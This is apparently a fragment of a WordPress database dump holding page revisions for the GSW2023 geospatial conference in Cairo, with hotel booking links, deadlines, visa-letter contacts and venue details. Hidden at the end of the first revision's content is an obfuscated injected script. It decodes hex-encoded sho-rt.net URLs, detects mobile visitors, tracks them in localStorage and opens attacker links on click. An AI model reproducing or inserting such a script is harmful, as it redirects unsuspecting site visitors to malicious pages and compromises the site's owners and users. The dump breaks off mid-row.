link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687389829594{margin-top: 7px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553011298{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #ffff00; background-color: white;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #ffff00; font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/4\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #ffff00;\"> Novotel Cairo El Borg Hotel</span></h4>\n<p><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://cf.bstatic.com/xdata/images/hotel/max1024x768/222745005.jpg?k=18dfdc6ae56119c43bcff6e4a4f7f46814bcc54610f91414d64746d41bc2e9d0&amp;o=&amp;hp=1\" alt=\"Gallery image of this property\" width=\"249\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 15, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687390894260{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> .</strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-23 20:43:34','2023-06-23 20:43:34','',3066,'https://gsw2023.com/?p=4751',0,'revision','',0),
(4752,4,'2023-06-23 20:43:55','2023-06-23 20:43:55','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner 